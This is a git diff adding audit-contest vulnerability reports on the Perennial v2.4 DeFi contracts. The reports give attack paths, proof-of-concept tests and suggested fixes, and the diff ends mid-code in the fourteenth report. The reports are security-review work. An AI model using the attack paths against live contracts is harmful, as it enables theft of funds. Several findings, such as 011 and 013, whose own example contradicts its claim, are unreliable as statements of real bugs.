diff --git a/.gitignore b/.gitignore deleted file mode 100644 index 3fbffbb..0000000 --- a/.gitignore +++ /dev/null @@ -1,10 +0,0 @@ -* -!*/ -!/.data -!/.github -!/.gitignore -!/README.md -!/comments.csv -!*.md -!**/*.md -!/Audit_Report.pdf diff --git a/001.md b/001.md new file mode 100644 index 0000000..f0ae74a --- /dev/null +++ b/001.md @@ -0,0 +1,123 @@ +Glorious White Albatross + +Medium + +# External attacker can cause the bypass position protection checks after order invalidation, making the order status inconsistent + +### Summary + +A missing protection flag reset in the Order invalidation logic will cause an inconsistent state issue for market participants as malicious actors can bypass position protection checks after order invalidation. + +### Root Cause + +In [OrderLib.sol](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/types/Order.sol#L87-L92) the `invalidate()` function zeroes out positions but fails to reset the protection flag, leading to an inconsistent state where an order can be both invalidated and protected simultaneously. + +The relevant code : +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/types/Order.sol#L87-L92 + +### Internal Pre-conditions + +1. A user needs to have a protected order (typically through liquidation) + +### External Pre-conditions + +No + +### Attack Path + +1. Attacker waits for a protected order to be created (e.g., through liquidation) +2. When the oracle reports an invalid price: The order gets invalidated through `invalidate()` function and `Positions `are zeroed but protection flag remains set +3. The attacker can now bypass certain invariant checks that depend on protection status +4. This allows them to execute operations that should be blocked for protected orders +5. The market contract enters an inconsistent state where protection mechanisms can be circumvented + +### Impact + +Protected orders can be manipulated in ways that violate the intended market safety mechanisms +Market invariants is violated as well. + +### PoC + +```ts +describe('#poc', async () => { + beforeEach(async () => { + await market.connect(owner).updateParameter(marketParameter) + dsu.transferFrom.whenCalledWith(user.address, market.address, COLLATERAL.mul(1e12)).returns(true) + dsu.transferFrom.whenCalledWith(userB.address, market.address, COLLATERAL.mul(1e12)).returns(true) + }) + + it('invalidation vulnerability with protected orders', async () => { + // 1. Setup maker position + await market.connect(userB)['update(address,uint256,uint256,uint256,int256,bool)']( + userB.address, + POSITION, + 0, + 0, + COLLATERAL, + false + ) + + // 2. Create a protected order through liquidation + oracle.at.whenCalledWith(ORACLE_VERSION_2.timestamp).returns([ORACLE_VERSION_2, INITIALIZED_ORACLE_RECEIPT]) + oracle.status.returns([ORACLE_VERSION_2, ORACLE_VERSION_3.timestamp]) + oracle.request.whenCalledWith(user.address).returns() + + await settle(market, userB) + dsu.transfer.whenCalledWith(liquidator.address, EXPECTED_LIQUIDATION_FEE.mul(1e12)).returns(true) + dsu.balanceOf.whenCalledWith(market.address).returns(COLLATERAL.mul(1e12)) + + await market.connect(liquidator)['update(address,uint256,uint256,uint256,int256,bool)']( + userB.address, + 0, + 0, + 0, + 0, + true // Mark as protected + ) + + // 3. Move to next oracle version with invalid price + const INVALID_ORACLE_VERSION = { + ...ORACLE_VERSION_3, + valid: false + } + oracle.at.whenCalledWith(ORACLE_VERSION_3.timestamp).returns([INVALID_ORACLE_VERSION, INITIALIZED_ORACLE_RECEIPT]) + oracle.status.returns([INVALID_ORACLE_VERSION, ORACLE_VERSION_4.timestamp]) + oracle.request.whenCalledWith(userB.address).returns() + + // 4. Process the order - this should invalidate it but protection remains + await settle(market, userB) + + // 5. Verify the vulnerability + const order = await market.pendingOrders(userB.address, 2) + expect(order.maker).to.eq(0) // Position should be zeroed + expect(order.protection).to.eq(1) // Protection flag should be cleared but isn't + + // 6. This inconsistent state allows bypassing certain invariant checks + await market.connect(userB)['update(address,uint256,uint256,uint256,int256,bool)']( + userB.address, + POSITION, + 0, + 0, + 0, + false + ) + + // The operation succeeds when it should have failed due to protection status + const finalOrder = await market.pendingOrders(userB.address, 3) + expect(finalOrder.maker).to.eq(POSITION) // Should not be able to open position while protected + }) +}) +``` + +### Mitigation + +Add protection flag reset in the `invalidate()` function: + +```solidity +function invalidate(Order memory self, Guarantee memory guarantee) internal pure { + self.protection = 0; // Reset protection flag + (self.makerReferral, self.takerReferral) = + (UFixed6Lib.ZERO, guarantee.orderReferral); + // ... rest of the function +} +``` \ No newline at end of file diff --git a/002.md b/002.md new file mode 100644 index 0000000..ee37993 --- /dev/null +++ b/002.md @@ -0,0 +1,76 @@ +Lucky Peach Barbel + +High + +# Division by Zero in Asset-to-Share and Share-to-Asset Conversion Functions Causes Complete Vault Operation Freeze and Fund Lock + +### **Root Cause** +The issue stems from missing validation checks in the [_toSharesExact()](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/types/Checkpoint.sol#L236-L238) and [_toAssetsExact()](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/types/Checkpoint.sol#L232-L234) functions within `CheckpointLib`. These functions rely on the `self.assets` and `self.shares` variables to perform calculations involving division. Specifically: + +- In `_toSharesExact()`: + ```solidity + return assets.muldiv(self.shares, UFixed6Lib.unsafeFrom(self.assets)); + ``` + Here, the division `assets.muldiv(self.shares, UFixed6Lib.unsafeFrom(self.assets))` does not check if `self.assets` is zero. If `self.assets == 0`, the division operation causes a revert due to division by zero. + +- Similarly, in `_toAssetsExact()`: + ```solidity + return shares.muldiv(UFixed6Lib.unsafeFrom(self.assets), self.shares); + ``` + This function assumes that both `self.assets` and `self.shares` are non-zero. If `self.shares == 0`, the division will revert due to a division by zero error. + +- **`self.assets` Can Be Zero**: + - This occurs when the vault has no assets remaining. This may happen due to high withdrawal fees, mismanagement of vault funds, or external market conditions reducing the collateral. + +- **`self.shares` Can Be Zero**: + - This happens when the vault is fresh (no shares minted yet) or has been completely redeemed by all users, resulting in `self.shares == 0`. +The lack of a guard clause (e.g. `require(self.assets > 0)` or `require(self.shares > 0)`) means: +1. These division-by-zero scenarios are not handled gracefully. +2. Any function calling `_toSharesExact()` or `_toAssetsExact()` will revert, halting execution and preventing user interactions with the vault. +This issue is critical because it directly blocks user operations, essentially locking funds in the vault. + +--- + +### **Internal Pre-conditions** +1. `self.assets` must be exactly 0 due to vault insolvency or high fees reducing the asset balance to zero. +2. `self.shares` must be greater than 0, ensuring the division logic is triggered. + +--- + +### **External Pre-conditions** +None. This issue arises purely from internal contract state mismanagement. + +--- + +### **Attack Path** +1. A user interacts with a function that calls `_toSharesExact()` or `_toAssetsExact()` (e.g., converting assets to shares). +2. If `self.assets` or `self.shares` is zero, the division operation will revert the transaction. +3. All users attempting similar operations will face locked funds and inability to execute transactions. + +--- + +### **Impact** +[toSharesGlobal()](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/types/Checkpoint.sol#L155) +```solidity +return self.assets.lte(Fixed6Lib.ZERO) ? + assets.unsafeSub(settlementFee) : + _toShares(self, assets).unsafeSub(_toSharesExact(self, settlementFee)); +``` +If `self.assets == 0`, `_toSharesExact()` will revert. This blocks user deposits from being converted into shares, effectively halting all deposit operations globally. +[toAssetsGlobal()](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/types/Checkpoint.sol#L164) +If `self.shares == 0`, `_toAssetsExact()` will revert. This blocks users from converting shares back to assets, freezing all redemption operations globally. +```solidity +return (self.shares.isZero() ? shares : _toAssets(self, shares)).unsafeSub(settlementFee); +``` +[complete()](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/types/Checkpoint.sol#L101) +```solidity +self.shares = self.shares.add(profitShares); +... +profitShares = profitAssets.mul(self.shares).div(UFixed6Lib.unsafeFrom(self.assets).sub(profitAssets)); +``` +If `self.assets == 0`, the profit-sharing calculation in `complete()` will revert. This prevents the checkpoint from finalizing, locking all state updates and stopping vault operations. + +--- + +### **Mitigation** +Add `require(self.assets > 0, "Assets cannot be zero")` and `require(self.shares > 0, "Shares cannot be zero")` checks before performing division in `_toSharesExact()` and `_toAssetsExact()`. \ No newline at end of file diff --git a/003.md b/003.md new file mode 100644 index 0000000..a39937f --- /dev/null +++ b/003.md @@ -0,0 +1,18 @@ +Lucky Peach Barbel + +Medium + +# Oracle Manipulation Allows Execution of Invalid Orders + +### Description +The [executeOrder](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/periphery/contracts/TriggerOrders/Manager.sol#L141) function in the `Manager` contract rely on the latest price fetched from the market's oracle (`market.oracle().latest()`) to determine whether an order's conditions are satisfied. This dependency exposes the protocol to oracle manipulation attacks, where an attacker could influence the reported price, either directly (e.g. by controlling or bribing the oracle) or indirectly (e.g. using a flash loan to temporarily alter the on-chain price used by the oracle). For instance, in the `checkOrder` function: +```solidity +canExecute = order.canExecute(market.oracle().latest()); +``` +A manipulated oracle price could incorrectly signal that an order is executable when it is not, enabling the attacker to execute orders under conditions that would normally not be met. This lack of price validation in the [latest](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/oracle/contracts/keeper/KeeperOracle.sol#L115-L117) function of the `KeeperOracle.sol` can lead to usage of stale `latestVersion` leaving the system vulnerable to malicious price swings during a transaction. + +### **Impact:** +The primary impact is that attackers could exploit manipulated oracle prices to execute orders improperly, potentially draining user funds or destabilizing the system by executing invalid trades. + +### **Mitigation:** +Add a staleness check in the `latest()` function to validate that the returned latestVersion is recent by comparing its timestamp with the current block timestamp and rejecting stale versions. \ No newline at end of file diff --git a/004.md b/004.md new file mode 100644 index 0000000..3035c09 --- /dev/null +++ b/004.md @@ -0,0 +1,21 @@ +Lucky Peach Barbel + +Medium + +# Premature Fee Deduction in `next.collateral` Update Leads to Incorrect Collateral Calculations + +In the `accumulate()` function of `CheckpointLib`,[the `next.collateral` calculation](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/CheckpointLib.sol#L84-L86) prematurely subtracts settlement and trade fees from the latest checkpoint’s collateral before incorporating new collateral changes, price overrides, and other adjustments. Specifically, the code snippet below deducts `tradeFee` and `settlementFee` early in the calculation: + +```solidity +next.collateral = settlementContext.latestCheckpoint.collateral + .sub(settlementContext.latestCheckpoint.tradeFee) + .sub(Fixed6Lib.from(settlementContext.latestCheckpoint.settlementFee)); +``` + +This approach assumes that all fees are finalized and processed, which may not hold true if there are pending updates or deferred fee calculations in the [toVersion](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/CheckpointLib.sol#L71). As a result, when the function subsequently adds the new collateral changes and price overrides (`result.collateral` and `result.priceOverride`), it can either double-deduct fees that are recomputed later or produce incorrect final values for `next.collateral`. This discrepancy creates potential inaccuracies in collateral tracking, particularly during edge cases involving concurrent settlement and collateral adjustments. + +#### **Impact**: +The primary impact of this bug is under-collateralization, where the system misrepresents available collateral due to redundant or incomplete fee deductions, which can lead to insolvency or liquidation errors. + +#### **Mitigation**: +Reorder the calculation of `next.collateral` so that settlement and trade fees are subtracted only after adding all new collateral, price override, and other adjustments. \ No newline at end of file diff --git a/005.md b/005.md new file mode 100644 index 0000000..4ea1d14 --- /dev/null +++ b/005.md @@ -0,0 +1,89 @@ +Raspy Black Giraffe + +Medium + +# SolverVault Coordinator Will Cause Losses for Vault Users via Unprotected Rebalancing + +### Summary + +The lack of slippage controls in the rebalance function will cause financial losses for vault users as the coordinator's transactions can be front-run or executed under unfavorable market conditions. + +### Root Cause + +In [SolverVault.sol](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/a77aaa94d3b3a9725e4474428bc0a18ca2fde3b4/perennial-v2/packages/vault/contracts/SolverVault.sol#L40) there is no slippage checks +```solidity +function rebalance(IMarket from, IMarket to, UFixed6 amount) external onlyCoordinator { + if (!_isRegistered(from) || !_isRegistered(to)) revert SolverVaultNotRegisteredError(); + from.update(address(this), Fixed6Lib.ZERO, Fixed6Lib.from(-1, amount), address(0)); + to.update(address(this), Fixed6Lib.ZERO, Fixed6Lib.from(1, amount), address(0)); + } +``` + +### Internal Pre-conditions + +1- Coordinator needs to call rebalance() to move funds between markets. +2- Vault must hold sufficient collateral in the from market. + +### External Pre-conditions + +1- Market prices for the involved assets must be volatile +2- The rebalance transaction is delayed, allowing market conditions to change unfavorably. + +### Attack Path + +1- Coordinator calls rebalance(fromMarket, toMarket, 1000 USDC) to adjust positions. + +2- Attacker detects the transaction in the mempool and front-runs it by: +Artificially inflating the price of toMarket via a large buy order. +Artificially deflating the price of fromMarket via a large sell order. + +3- The coordinator’s rebalance executes at manipulated prices: +Vault sells fromMarket at a lower-than-expected price. +Vault buys toMarket at a higher-than-expected price. + +### Impact + +Vault users suffer losses proportional to the manipulated price difference during rebalancing. For example: + +If the attacker causes a 5% price impact, users lose ~5% of the rebalanced amount. +Attacker gains profit by closing their manipulated positions after the vault’s trade. + +### PoC + +```solidity +// Simplified Foundry test showcasing front-running +function testFrontrunRebalance() public { + // 1. Setup: Vault holds 1000 USDC in MarketA + _depositToVault(1000e6); + + // 2. Attacker manipulates MarketB’s price upward + vm.startPrank(attacker); + marketB.trade(attacker, 1_000_000e6); // Inflate price + vm.stopPrank(); + + // 3. Coordinator’s rebalance executes at bad prices + vm.prank(coordinator); + solverVault.rebalance(marketA, marketB, 1000e6); + + // 4. Verify loss: Vault’s total assets decrease + assertLt(solverVault.totalAssets(), 1000e6); +} +``` + +### Mitigation + +Add slippage controls to the rebalance function : +```solidity +function rebalance( + IMarket from, + IMarket to, + UFixed6 amount, + UFixed6 minAmountFrom, // Minimum received from `from` market + UFixed6 minAmountTo, // Minimum received to `to` market + uint256 deadline // Transaction expiry timestamp +) external onlyCoordinator { + if (block.timestamp > deadline) revert Expired(); + (UFixed6 actualFrom, UFixed6 actualTo) = _executeRebalance(from, to, amount); + if (actualFrom < minAmountFrom || actualTo < minAmountTo) revert SlippageExceeded(); +} +``` \ No newline at end of file diff --git a/006.md b/006.md new file mode 100644 index 0000000..c23ce34 --- /dev/null +++ b/006.md @@ -0,0 +1,73 @@ +Raspy Black Giraffe + +Medium + +# Incorrect Collateral Socialization Will Cause Unfair Claim Reductions for Vault Users + +### Summary + +The use of min(totalCollateral, global.assets) in the _socialize function will cause unfair claim reductions for vault users as temporary collateral mismatches penalize legitimate redemptions. + +### Root Cause + +In [Vault.sol#L353-L363](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/a77aaa94d3b3a9725e4474428bc0a18ca2fde3b4/perennial-v2/packages/vault/contracts/Vault.sol#L353-L363), the socialization formula prorates user claims based on min(totalCollateral, global.assets) which fails to distinguish between permanent undercollateralization and temporary mismatches (e.g., pending deposits not yet deployed to markets) + +```solidity +function _socialize(Context memory context, UFixed6 claimAssets) private pure returns (UFixed6) { + return context.global.assets.isZero() ? + UFixed6Lib.ZERO : + claimAssets.muldiv( + UFixed6Lib.unsafeFrom(context.totalCollateral).min(context.global.assets), // Problematic line + context.global.assets + ); +} +``` + +### Internal Pre-conditions + +1- Pending Deposits/Redemptions: global.assets includes pending deposits not yet reflected in totalCollateral. +2- Coordinator Action: The coordinator must delay rebalancing, leaving totalCollateral temporarily mismatched with global.assets. + +### External Pre-conditions + +1- Market Volatility: Asset prices fluctuate between deposit initiation and rebalancing. +2- Delayed Settlement: Oracle updates or market settlements lag, preventing totalCollateral from matching global.assets. + +### Attack Path + +1- User A deposits 100 USDC: +global.assets increases by 100 USDC (now 1000 USDC). +totalCollateral remains at 900 USDC (deposit not yet deployed). + +2- User B redeems 100 USDC: +_socialize computes claim as 100 * min(900, 1000) / 1000 = 90 USDC. + +3- Result: +User B receives 90 USDC instead of 100 USDC, despite the vault being solvent. + + + +### Impact + +Loss Magnitude: Users lose funds proportional to the temporary mismatch (e.g., 10% loss in the example above). +Trust Erosion: Repeated unfair reductions degrade user confidence in the vault’s fairness. + +### PoC + +_No response_ + +### Mitigation + +Modify _socialize to only apply prorating during true undercollateralization : +```solidity +function _socialize(Context memory context, UFixed6 claimAssets) private pure returns (UFixed6) { + if (context.global.assets.isZero()) return UFixed6Lib.ZERO; + + UFixed6 availableCollateral = UFixed6Lib.unsafeFrom(context.totalCollateral); + // Only apply prorating if the vault is undercollateralized + if (availableCollateral >= context.global.assets) return claimAssets; // Fix + + return claimAssets.muldiv(availableCollateral, context.global.assets); +} +``` +This ensures users are penalized only when the vault lacks sufficient collateral, not during transient states. diff --git a/007.md b/007.md new file mode 100644 index 0000000..d1d9137 --- /dev/null +++ b/007.md @@ -0,0 +1,26 @@ +Lucky Peach Barbel + +Medium + +# Stale Price Check Bypass Due to Incorrect Conditional Logic in `validate` Function + +The [validate](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L19-L115) function in `InvariantLib` contains a critical flaw in its stale price check logic. The condition `!(newOrder.isEmpty() && newOrder.collateral.gte(Fixed6Lib.ZERO))` is incorrectly placed, allowing the stale price check to be bypassed when the order is empty and collateral is non-negative, even if the sender has an open position. Specifically, the code snippet: + +```solidity +if ( + !(context.latestPositionLocal.magnitude().isZero() && context.pendingLocal.isEmpty()) && // sender has no position + !(newOrder.isEmpty() && newOrder.collateral.gte(Fixed6Lib.ZERO)) && // sender is depositing zero or more into account, without position change + ( + !context.latestOracleVersion.valid || + context.currentTimestamp - context.latestOracleVersion.timestamp >= context.riskParameter.staleAfter + ) // price is not stale +) revert IMarket.MarketStalePriceError(); +``` + +fails to enforce the stale price check when `newOrder.isEmpty()` and `newOrder.collateral.gte(Fixed6Lib.ZERO)` are true, regardless of whether the sender has an open position. This means that even if the oracle price is stale, the function will not revert if the order is empty and collateral is non-negative, allowing unsafe operations (e.g., liquidations or position updates) to proceed using outdated prices. + +### Impact: +The primary impact of this bug is that stale oracle prices can be used for critical operations, such as liquidations or margin calculations, leading to incorrect state transitions and potential financial losses for users. For example, a liquidation could be executed based on an outdated price, unfairly penalizing a user whose position would otherwise be solvent with the latest price. + +### Mitigation: +Restructure the conditional logic to ensure the stale price check is enforced whenever the sender has an open position, regardless of whether the order is empty or collateral is non-negative. \ No newline at end of file diff --git a/008.md b/008.md new file mode 100644 index 0000000..e015d74 --- /dev/null +++ b/008.md @@ -0,0 +1,24 @@ +Lucky Peach Barbel + +Medium + +# Incorrect Single-Sided Position Validation Leading to Potential State Corruption + +The [validate](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L19-L115) function includes a check to ensure that positions are single-sided (i.e either entirely maker or taker, but not both). However, the logic is flawed in the following snippet: + +```solidity + if (!updateContext.currentPositionLocal.singleSided()) revert IMarket.MarketNotSingleSidedError(); + + if ( + (!context.latestPositionLocal.maker.isZero() && !updateContext.currentPositionLocal.skew().isZero()) || + (!context.latestPositionLocal.skew().isZero() && !updateContext.currentPositionLocal.maker.isZero()) + ) revert IMarket.MarketNotSingleSidedError(); +``` + +The issue arises because the second condition redundantly checks the same state as the first condition (`updateContext.currentPositionLocal.singleSided()`). Additionally, the validation does not account for pending positions (`context.pendingLocal`), which could result in a state where the current position appears single-sided, but the pending position introduces a mixed state (both maker and taker). This oversight could allow a position to transition into an invalid mixed state during execution. + +### Impact: +System could allow positions to become mixed (both maker and taker), violating the single-sided invariant. This could lead to incorrect margin calculations, unfair liquidations, or other unintended behaviors that compromise the integrity of the market. + +### Mitigation: +Update the validation logic to include pending positions and ensure the single-sided invariant is enforced holistically. \ No newline at end of file diff --git a/009.md b/009.md new file mode 100644 index 0000000..31ac24c --- /dev/null +++ b/009.md @@ -0,0 +1,22 @@ +Lucky Peach Barbel + +Medium + +# Users attempting to fully close their positions may find their positions still open due to Incorrect Handling of `MAGIC_VALUE_FULLY_CLOSED_POSITION` + +The [_processPositionMagicValue](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/MagicValueLib.sol#L50-L61) function in `MagicValueLib` incorrectly handles the `MAGIC_VALUE_FULLY_CLOSED_POSITION` magic value. When `context.pendingLocal.crossesZero()` returns `true`, the function returns the `currentPosition` without reducing it, even though the intent of `MAGIC_VALUE_FULLY_CLOSED_POSITION` is to fully close the position. This occurs because the function prioritizes the zero-crossing check over the intended action of closing the position. Specifically, the code snippet below shows the flawed logic: + +```solidity +if (newPosition.eq(MAGIC_VALUE_FULLY_CLOSED_POSITION)) { + if (context.pendingLocal.crossesZero()) return currentPosition; // @audit Ignores fully close intent + return context.pendingLocal.pos().min(currentPosition); +} +``` + +This logic fails to ensure that the position is fully closed when `crossesZero()` is `true`, this inconsistency can lead to unexpected behavior where the position remains open despite the user's request to close it. +### **Impact**: +Users attempting to fully close their positions may find their positions still open, leading to unintended exposure to market risks or financial losses due to unexpected margin calls or liquidation. + +### **Mitigation**: +Ensure that `MAGIC_VALUE_FULLY_CLOSED_POSITION` always results in a fully closed position by returning `UFixed6Lib.ZERO` unconditionally, regardless of `crossesZero()`. + diff --git a/010.md b/010.md new file mode 100644 index 0000000..c2f7fc3 --- /dev/null +++ b/010.md @@ -0,0 +1,28 @@ +Lucky Peach Barbel + +Medium + +# If `totalCollateral` is negative, the `redemptionEligible` calculation will be incorrect, leading to improper allocation of collateral across markets + +The [_manage](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L434-L445) function is responsible for managing the internal collateral and position strategy of the vault. It uses the `context.totalCollateral` value to determine whether to proceed with rebalancing. However, there is a critical flaw in the logic where `context.totalCollateral` is checked against `Fixed6Lib.ZERO`: + +```solidity +if (context.totalCollateral.lt(Fixed6Lib.ZERO)) return; +``` + +This check is intended to prevent rebalancing if the total collateral is negative. However, the issue arises because `context.totalCollateral` is calculated as the sum of collaterals across all markets, and this sum can be negative even if individual market collaterals are positive or zero. This can happen due to rounding errors, market-specific adjustments, or other edge cases in the underlying market contracts. + +#### Impact: +If `context.totalCollateral` is incorrectly calculated as negative, the `_manage` function will prematurely exit, skipping the rebalancing process. This can lead to the vault fail to allocate collateral correctly across markets, leading to underfunded or overfunded positions. The vault's positions may also become misaligned with the intended strategy, increasing the risk of losses. The vault may as well miss opportunities to optimize its positions, leading to suboptimal performance. + +#### Example Scenario: +- Suppose the vault has two markets: + - Market A has a collateral of `+100`. + - Market B has a collateral of `-50`. +- The total collateral (`context.totalCollateral`) would be `+50`, which is positive. +- However, due to a bug or rounding error, the calculation incorrectly results in `-50`. +- The `_manage` function exits prematurely, skipping the rebalancing process. +- As a result, the vault's positions are not updated, leading to potential misallocation of collateral. + +#### Fix: +Instead of relying solely on the sum of collaterals, the `_manage` function should ensure that each individual market's collateral is non-negative before proceeding with rebalancing. \ No newline at end of file diff --git a/011.md b/011.md new file mode 100644 index 0000000..2af25a9 --- /dev/null +++ b/011.md @@ -0,0 +1,35 @@ +Lucky Peach Barbel + +High + +# If `context.global.assets` is zero the `_socialize` function will return `UFixed6Lib.ZERO`, effectively preventing users from claiming any assets + +The [_update](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L313-L351) function allows users to deposit assets, redeem shares, and claim assets. However, there is a critical flaw in the handling of `claimAssets`. Specifically, [the function uses the following logic to determine the claim amount](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L338): + +```solidity +UFixed6 claimAmount = _socialize(context, claimAssets); +``` + +The [_socialize](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L356-L363) function calculates the claim amount based on the proportion of `claimAssets` to the total global assets, but it does not account for the possibility that `context.global.assets` could be zero. If `context.global.assets` is zero, the calculation: + +```solidity +return context.global.assets.isZero() ? + UFixed6Lib.ZERO : + claimAssets.muldiv( + UFixed6Lib.unsafeFrom(context.totalCollateral).min(context.global.assets), + context.global.assets + ); +``` + +will return `UFixed6Lib.ZERO`, effectively preventing users from claiming any assets, even if there are assets available in the vault. + +#### Impact: + Users may be unable to claim their assets, even if the vault has sufficient collateral. + +#### Example Scenario: +- A user attempts to claim assets (`claimAssets`) from the vault. +- Due to a temporary state where `context.global.assets` is zero (e.g. during a rebalance or settlement), the `_socialize` function returns `UFixed6Lib.ZERO`. +- The user receives no assets, even though the vault has sufficient collateral to fulfill the claim. + +#### Fix: +the `_socialize` function should handle the case where `context.global.assets` is zero by allowing users to claim their proportional share of the total collateral. \ No newline at end of file diff --git a/012.md b/012.md new file mode 100644 index 0000000..e21e3c2 --- /dev/null +++ b/012.md @@ -0,0 +1,47 @@ +Shambolic Mint Dinosaur + +High + +# The update functions lack a deadline parameter. + +### Summary + +In the Market.sol contract the update functions lack a deadline parameter. Attackers can exploit pending transactions during high volatility by executing them at unfavorable times. + +### Root Cause + +In +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L147 +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L176 +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L213 +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L223 +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L232 +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L247 +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L264 +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L283 + + the update functions lack a deadline parameter. Attackers can exploit pending transactions during high volatility by executing them at unfavorable times. + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +_No response_ + +### Impact + +Transactions can be front-run or delayed, leading to sandwich attacks. + +### PoC + +_No response_ + +### Mitigation + +Add a deadline parameter to all user-initiated functions and validate block.timestamp <= deadline. \ No newline at end of file diff --git a/013.md b/013.md new file mode 100644 index 0000000..07d085e --- /dev/null +++ b/013.md @@ -0,0 +1,24 @@ +Lucky Peach Barbel + +Medium + +# attacker can perform both deposit and redemption in the same transaction + +The [_update](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L313-L351) function handles deposits, redemptions, and claims for a given account. It ensures that the operations are single-sided (i.e. only one of deposit, redemption, or claim can be performed at a time) and enforces various invariants. However, there is a critical flaw in the logic that checks the invariants, specifically in the validation of `depositAssets` and `redeemShares`. +The invariant check in the `_update` function is [as follows](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L327-L328): + +```solidity + if (!depositAssets.add(redeemShares).add(claimAssets).eq(depositAssets.max(redeemShares).max(claimAssets))) + revert VaultNotSingleSidedError(); +``` + +The intention of this check is to ensure that only one of `depositAssets`, `redeemShares`, or `claimAssets` is non-zero at a time, enforcing single-sided operations. However, the logic is flawed because it does not correctly handle the case where two or more of these values are non-zero but their sum equals the maximum value among them. + +#### Impact: +An attacker could potentially perform multiple operations (e.g., deposit and redeem) simultaneously by carefully choosing values for `depositAssets`, `redeemShares`, and `claimAssets` that satisfy the flawed invariant check. This could lead to unexpected behavior in the vault's accounting, such as incorrect updates to the user's shares or assets, potentially resulting in financial losses or other issues. + +Example Scenario: +An attacker wants to both deposit and redeem assets in the same transaction. The attacker sets `depositAssets = 100`, `redeemShares = 100`, and `claimAssets = 100`. The invariant check `100 + 100 + 100 == 100.max(100).max(100)` evaluates to `300 == 100`, which should fail. However, due to the flawed logic, the check might incorrectly pass, allowing the attacker to perform both deposit and redemption in the same transaction. + +#### mitigation +the invariant check should be modified to ensure that only one of `depositAssets`, `redeemShares`, or `claimAssets` is non-zero. This can be done by checking that the sum of the non-zero counts is exactly one. \ No newline at end of file diff --git a/014.md b/014.md new file mode 100644 index 0000000..5f8189c --- /dev/null +++ b/014.md @@ -0,0 +1,143 @@ +Mammoth Mocha Koala + +Medium + +# Invalid Oracle Handling and Position Updates + +### Summary + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L716C5-L774C6 + +When an order is added to pending, both global and local positions are immediately updated with the order's amounts. + +During settlement, if the oracle version is invalid, the order is invalidated (amounts set to zero), and the pending is subtracted. + +However, the positions (global and local) are not reverted to their pre-order state. This results in positions being permanently increased by invalid orders, breaking the invariant that positions should only reflect valid, settled orders + +### Root Cause + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L716C5-L774C6 + + function _update( + Context memory context, + UpdateContext memory updateContext, + Order memory newOrder, + Guarantee memory newGuarantee, + address orderReferrer, + address guaranteeReferrer + ) private notSettleOnly(context) { + // advance to next id if applicable + if (context.currentTimestamp > updateContext.orderLocal.timestamp) { + updateContext.orderLocal.next(context.currentTimestamp); + updateContext.guaranteeLocal.next(); + updateContext.liquidator = address(0); + updateContext.orderReferrer = address(0); + updateContext.guaranteeReferrer = address(0); + context.local.currentId++; + } + if (context.currentTimestamp > updateContext.orderGlobal.timestamp) { + updateContext.orderGlobal.next(context.currentTimestamp); + updateContext.guaranteeGlobal.next(); + context.global.currentId++; + } + + + // update current position + updateContext.currentPositionGlobal.update(newOrder); + updateContext.currentPositionLocal.update(newOrder); + + + // apply new order + updateContext.orderLocal.add(newOrder); + updateContext.orderGlobal.add(newOrder); + context.pendingGlobal.add(newOrder); + context.pendingLocal.add(newOrder); + updateContext.guaranteeGlobal.add(newGuarantee); + updateContext.guaranteeLocal.add(newGuarantee); + + + // update collateral + 